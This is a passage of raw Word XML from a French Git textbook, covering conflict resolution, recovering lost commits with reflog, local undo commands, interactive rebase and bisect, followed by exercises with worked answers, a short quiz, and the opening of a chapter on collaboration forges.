        <w:t>git log --oneline HEAD...feature/menu -- src/menu.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># 2. Produire la version correcte, sans marqueurs</w:t>
        <w:br/>
        <w:t># 3. Vérifier</w:t>
        <w:br/>
        <w:t>git diff</w:t>
        <w:br/>
        <w:t>git add src/menu.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># 4. Terminer</w:t>
        <w:br/>
        <w:t>git merge --continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.173 — Cinq outils de conflit</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25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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="325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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Quand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git merge --abort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Annule la fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conflit trop large</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="325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git checkout --ours f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Garde la version locale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Fichier généré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git checkout --theirs f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Garde la version entrante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="325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git mergetool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Ouvre un outil visuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Conflits nombreux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>git rerere</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3251"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mémorise les résolutions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rebasages répétés</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RÉDUIRE LES CONFLITS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des commits petits, des branches courtes et des fichiers découpés par responsabilité réduisent mécaniquement les conflits. Un fichier de mille lignes modifié par trois personnes produit des conflits quotidiens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>50.4 Réparer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Git conserve presque tout. La récupération repose sur le journal des références, qui enregistre chaque déplacement de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois récupérations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J'ai réinitialisé et perdu un commit</w:t>
        <w:br/>
        <w:t>git reflog</w:t>
        <w:br/>
        <w:t># a1b2c3 HEAD@{3}: commit: Ajoute la validation</w:t>
        <w:br/>
        <w:br/>
        <w:t>git branch sauvetage a1b2c3</w:t>
        <w:br/>
        <w:t>git switch sauvetage</w:t>
        <w:br/>
        <w:br/>
        <w:t># J'ai supprimé une branche non fusionnée</w:t>
        <w:br/>
        <w:t>git reflog --all | grep feature/menu</w:t>
        <w:br/>
        <w:t>git branch feature/menu &lt;sha&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Annuler un commit poussé, sans réécrire</w:t>
        <w:br/>
        <w:t>git revert &lt;sha&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six niveaux d'annulation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Annulations locales, du plus doux au plus radical</w:t>
        <w:br/>
        <w:t>git restore fichier.js              # annule les modifications non préparées</w:t>
        <w:br/>
        <w:t>git restore --staged fichier.js     # désindexe</w:t>
        <w:br/>
        <w:t>git commit --amend                  # corrige le dernier commit (local)</w:t>
        <w:br/>
        <w:t>git reset --soft HEAD~1             # défait le commit, garde les changements</w:t>
        <w:br/>
        <w:t xml:space="preserve">  préparés</w:t>
        <w:br/>
        <w:t>git reset --mixed HEAD~1            # défait et désindexe</w:t>
        <w:br/>
        <w:t>git reset --hard HEAD~1             # détruit les changements</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`GIT REFLOG`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Journal local des déplacements de référence, conservé environ 90 jours. C'est le filet de sécurité de Git : tout commit ayant existé y figure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>50.5 Nettoyer avant de partager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un historique lisible s'obtient en réorganisant ses propres commits avant de les proposer. Trois opérations couvrent la majorité des cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois opérations de nettoyage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Réordonner, fusionner, renommer, supprimer</w:t>
        <w:br/>
        <w:t>git rebase -i HEAD~5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Diviser un commit trop gros</w:t>
        <w:br/>
        <w:t>git reset HEAD~1</w:t>
        <w:br/>
        <w:t>git add -p</w:t>
        <w:br/>
        <w:t>git commit -m "Extrait la validation du formulaire"</w:t>
        <w:br/>
        <w:t>git add .</w:t>
        <w:br/>
        <w:t>git commit -m "Ajoute le style des messages d'erreur"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Chercher le commit qui a introduit un bogue</w:t>
        <w:br/>
        <w:t>git bisect start</w:t>
        <w:br/>
        <w:t>git bisect bad</w:t>
        <w:br/>
        <w:t>git bisect good v1.3.0</w:t>
        <w:br/>
        <w:t># ... git bisect good|bad jusqu'à identification</w:t>
        <w:br/>
        <w:t>git bisect reset</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AVANT DE DEMANDER UNE FUSION</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git log --oneline main..HEAD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : les commits sont-ils cohérents ?</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git diff main...HEAD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le contenu est-il complet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Les tests passent-ils après un rebasage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La branche est-elle à jour avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ?</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Git stocke des instantanés reliés par des parentés, pas des différences.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branche est une étiquette mobile sur un commit.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Fusion pour l'historique partagé, rebasage pour le travail local.</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Ne jamais rebaser une branche publique.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conflit se résout en comprenant les deux intentions.</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git reflog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet de retrouver un commit perdu.</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git revert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annule sans réécrire l'historique.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rebasage interactif nettoie avant de partager.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Git fonctionne en local. Le chapitre suivant l'ouvre sur la collaboration : forges, revues et automatisation.</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50.1 — Nettoyer une branche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Quatre commits de travail doivent devenir un commit cohérent.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Nommez la branche de secours.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Fusionnez les commits.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Reformulez le message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 50.2 — Récupérer un commit perdu</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 xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reset --hard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a supprimé le travail de la journée.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Consultez le reflog.</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Identifiez le commit.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Recréez une branche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 50.3 — Résoudre un conflit de fusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   COLLABORATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux branches modifient la même fonction de validation.</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Lisez l'intention de chaque version.</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Produisez une version qui satisfait les deux.</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par un test.</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50.1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git branch sauvegarde</w:t>
        <w:br/>
        <w:t>git rebase -i main</w:t>
        <w:br/>
        <w:br/>
        <w:t># pick a1b2c3 WIP</w:t>
        <w:br/>
        <w:t># squash 4d5e6f Correction</w:t>
        <w:br/>
        <w:t># squash 7a8b9c Encore une correction</w:t>
        <w:br/>
        <w:t># squash 0c1d2e Tests</w:t>
        <w:br/>
        <w:br/>
        <w:t># Message final :</w:t>
        <w:br/>
        <w:t># Ajoute le filtre des programmes avec tests</w:t>
        <w:br/>
        <w:t># - filtres accessibles au clavier</w:t>
        <w:br/>
        <w:t># - compteur annoncé</w:t>
        <w:br/>
        <w:t># - trois tests unitaires</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La branche de secours permet de revenir à l'état initial sans effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le message final décrit le résultat, pas la suite des tentatives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 50.2</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git reflog</w:t>
        <w:br/>
        <w:t># 9f8e7d HEAD@{2}: reset: moving to HEAD~1</w:t>
        <w:br/>
        <w:t># a1b2c3 HEAD@{3}: commit: Ajoute la validation</w:t>
        <w:br/>
        <w:br/>
        <w:t>git branch travail-retrouve a1b2c3</w:t>
        <w:br/>
        <w:t>git switch travail-retrouve</w:t>
        <w:br/>
        <w:t>git log --oneline -3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le reflog conserve les positions successives de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pendant environ 90 jours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Travailler sur une nouvelle branche avant de décider de réintégrer évite de perdre à nouveau l'état.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 50.3</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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:t>git merge feature/validation</w:t>
        <w:br/>
        <w:br/>
        <w:t># Inspecter les deux versions du fichier</w:t>
        <w:br/>
        <w:t>git show HEAD:src/validation.js</w:t>
        <w:br/>
        <w:t>git show feature/validation:src/validation.js</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après résolution manuelle et test</w:t>
        <w:br/>
        <w:t>git add src/validation.js</w:t>
        <w:br/>
        <w:t>git commit --no-edit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Comparer les deux versions complètes aide plus que lire les marqueurs extraits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un test lancé après résolution prouve que la combinaison fonctionne, pas seulement qu'elle compile.</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Qu'est-ce qu'une branche Git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Une copie des fichiers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Une étiquette sur un commit</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Un dossier</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Un serveur</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Quand le rebasage est-il déconseillé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Sur une branche locale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Sur une branche publique partagée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Avant une fusion</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Après un commit</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Quelle commande retrouve un commit perdu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git log</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git reflog</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git fsck</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git status</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git revert</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Réécrit l'historique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Crée un commit qui annule un précédent</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Supprime une branche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Réinitialise le dépôt</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git reset --hard</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Garde les modifications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Détruit les modifications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Pousse les commits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Crée une branche</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Une branche est une référence mobile vers un commit.</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Réécrire un historique partagé crée des divergences pour tous.</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Le reflog conserve les déplacements de référence.</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Il produit un nouveau commit inverse, sans toucher à l'historique.</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L'option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--hard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réinitialise l'arbre de travail et l'index.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>51. Forges, revues et collaboration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Organiser le travail à plusieurs : dépôts, demandes de fusion, automatisation et règles de contribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 50</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Configurer un dépôt distant et ses protections.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Choisir une stratégie de branches adaptée à l'équipe.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Conduire une revue de code utile.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Automatiser les vérifications d'une demande de fusion.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Rédiger des règles de contribution claires.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>51.1 Deux familles de forges</w:t>
      </w:r>
    </w:p>
    <w:p>
